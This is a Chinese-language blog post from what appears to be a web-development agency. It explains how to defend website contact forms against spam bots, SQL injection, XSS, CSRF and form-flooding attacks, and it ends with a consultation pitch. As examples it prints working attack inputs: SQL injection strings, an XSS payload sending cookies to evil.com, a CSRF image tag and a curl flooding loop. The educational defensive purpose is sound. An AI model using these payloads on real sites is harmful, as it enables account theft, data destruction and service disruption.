你有沒有過這種經驗?在經營網站的過程中,突然有一天,信箱被塞滿,手機通知也瘋狂跳動。
點開一看,哇!滿滿的「看不懂的亂碼英文」、「奇怪連結」,甚至還有夾帶惡意程式碼的訊息,全都是從網站表單灌進來的垃圾信。

表單原本應該是企業與客戶之間最重要的溝通橋樑,但一旦失守,就會淪為垃圾信與駭客的主要入口。不只浪費你篩選的時間,更可能讓真正的詢問被淹沒,甚至帶來資安風險。
👉 防止垃圾信,不只是「避免麻煩」,更是確保 網站營運穩定 與 行銷轉換有效 的第一步。
WordPress 常見防禦方法
如果你是使用 WordPress 架站,那麼表單垃圾信一定不陌生。由於 WordPress 是全球最普及的 CMS 系統,外掛與程式碼結構公開透明,自然也成了垃圾信機器人攻擊的首要目標。
最常見的解法,通常會先從外掛或設定著手:
- → Google reCAPTCHA :透過「我不是機器人」的驗證,或隱形驗證機制,自動攔截掉大部分的機器人送信。
- → Honeypot 技術:在表單中加入隱藏欄位,正常使用者看不到,但機器人會誤填,系統就能判斷是垃圾送出。
- → 防垃圾外掛:像是 Akismet、WPForms 搭配的 anti-spam 模組,能在不改程式的情況下快速部署。
不過,這些方法雖然能解決七、八成的問題,但垃圾信攻擊的手法也在不斷進化。
很多站長會發現:一開始好像很乾淨,但過一陣子垃圾信又回來了。這時候,就得思考是否該升級到更進階的 客製化防禦方案,才能真正守住表單。
客製化網站的進階防禦方法
表單防禦不是只為了擋掉「亂碼垃圾信」,而是要防止 自動化工具與惡意攻擊者 借由表單滲透網站。以下是幾個常見的攻擊實例與對應的防禦方法:

1. Spam Bot(垃圾機器人灌表單)
攻擊手法範例:
自動化程式會批量提交:
POST /contact
name=Buy+Viagra+Now&email=spam@bot.com&message=http://spam-link.example
通常會帶有:
- 亂碼英文 + 廣告字眼(viagra、casino、loan)
- 大量網址(http://、https:// 開頭)
- 重複 IP 在短時間灌爆
防禦方式:
- Honeypot 欄位(正常人不會填,機器人會填)
- reCAPTCHA / hCaptcha 行為驗證
- 黑名單過濾(封鎖高風險字詞、IP、網域)
- Rate Limiting:限制同一 IP 的提交頻率
2. SQL Injection(資料庫注入攻擊)
攻擊手法範例:
在表單欄位中輸入惡意 SQL:
' OR '1'='1
'; DROP TABLE users; --
admin' UNION SELECT null, username, password FROM users --
這些輸入若直接拼接進 SQL 查詢,就可能導致:
- 繞過登入驗證(永遠回傳 true)
- 竊取帳號密碼(透過 UNION SELECT)
- 刪除整個資料表(DROP TABLE)
防禦方式:
- 永遠使用 Prepared Statements(參數化查詢)
- 永不將表單輸入直接拼接成 SQL
- 對輸入內容做型別檢查(只能是字母、數字的欄位就拒絕特殊符號)
3. XSS(跨站腳本攻擊)
攻擊手法範例:
在留言或聯絡表單輸入:
<script>alert('Hacked!');</script>
或進階攻擊:
<img src=x onerror="document.location='http://evil.com/steal?cookie='+document.cookie">
效果:
- 讓訪客打開頁面時彈出提示(測試型)
- 竊取使用者 Cookie,冒用帳號登入(惡意型)
防禦方式:
- 對所有輸入做 HTML escape(例如
<script>
而不是<script>
) - 採用 白名單驗證(允許字母、數字,但拒絕
<
、>
、"
等符號) - 在 HTTP header 加上 Content-Security-Policy (CSP) 限制腳本來源
4. CSRF(跨站請求偽造)
攻擊手法範例:
攻擊者引導用戶點擊惡意連結:
<img src="https://victim-site.com/change_email?new=attacker@example.com">
若網站缺少驗證,用戶登入 Session 會直接執行這個請求,導致資料被竄改。
防禦方式:
- 每個表單附帶 CSRF Token(Session 綁定隨機字串)
- 驗證請求來源的 Referer / Origin Header
- 對敏感操作(如更改密碼、付款)要求二次驗證(SMS OTP 或 Email 驗證)
5. CC / DDoS 型表單攻擊

攻擊手法範例:
短時間內送出數千筆無效表單,導致伺服器資源被耗盡:
for i in {1..1000}; do
curl -X POST https://victim-site.com/form -d "name=spam$i&msg=attack"
done
防禦方式:
- 令牌 (Token) 機制:要求每次表單提交都先申請 Token
- Rate Limiting:限制同一 IP / 帳號的提交頻率
- WAF + 流量分析:自動辨識異常流量並阻擋
- CDN 防護(Cloudflare、Akamai):在邊緣節點過濾攻擊流量
客製化網站防禦不只是「裝一個 reCAPTCHA」,而是透過 多層防護(表單驗證 + 程式驗證 + 流量驗證),抵擋從垃圾信、Fake Leads 到 SQL Injection、XSS、CSRF、CC 攻擊的各種威脅。
👉 工程師能根據 實際流量模式 與 業務需求,持續更新黑名單、調整 Token 機制、優化驗證規則,讓表單安全不再只是「表面功夫」。
很多工程師會問:「那 CC 攻擊跟 DDoS 有什麼差別?」
其實 DDoS 更像是全網灌爆伺服器的升級版,如果你想看更完整的案例說明 👉《什麼是 DDoS?網站被塞爆背後的資安風險,金管會規範也要求揭露》。
實際建議
面對表單垃圾信與惡意攻擊,沒有「一勞永逸」的解法,只有「持續演進」的防禦策略。給不同網站經營者的建議如下:
✅ WordPress 使用者
- → 建立表單時務必啟用 reCAPTCHA / hCaptcha 或 Honeypot。
- → 定期更新外掛,避免已知漏洞被攻擊。
- → 若垃圾信持續湧入,考慮搭配 CleanTalk Anti-Spam、Akismet 或伺服器層防火牆。
✅ 客製化網站經營者
- → 在表單導入 多層驗證機制(欄位規則、CSRF Token、行為檢測、SMS OTP)。
- → 建立 黑名單 + 白名單,針對常見攻擊模式即時調整規則。
- → 與工程師合作,針對 SQL Injection、XSS、Fake Leads 等攻擊進行程式級別的防禦。
✅ 高價值或高風險網站(醫療、金融、電商)
- → 導入 Web Application Firewall (WAF),結合 DDoS 防禦與流量監控。
- → 使用 Rate Limiting 與 Token 機制 對抗 CC 攻擊。
- → 定期進行 滲透測試與資安檢測,及早發現漏洞。
在今天的數位環境裡,表單早已不只是「收集資料」的工具,而是網站安全的第一道門戶。
👉 防垃圾信的真正核心,不是單純「少收一點垃圾信」,而是 保障網站穩定、SEO 排名、用戶體驗與品牌信譽。
如果你正在為表單垃圾信或惡意攻擊困擾,不論是 WordPress 或客製化網站,都建議與專業工程師討論,打造符合自身需求的防禦方案。
常見問題 FAQ
「表單防禦」不是裝個外掛就好。
垃圾信、SQL Injection、XSS 攻擊,
輕則灌爆信箱,重則失去客戶信任。
👉 如果你想讓表單不再成為破口,
交給我們,從外掛到程式級防禦一次到位。
🔒 你的網站,由我們來守護。
立即諮詢防護方案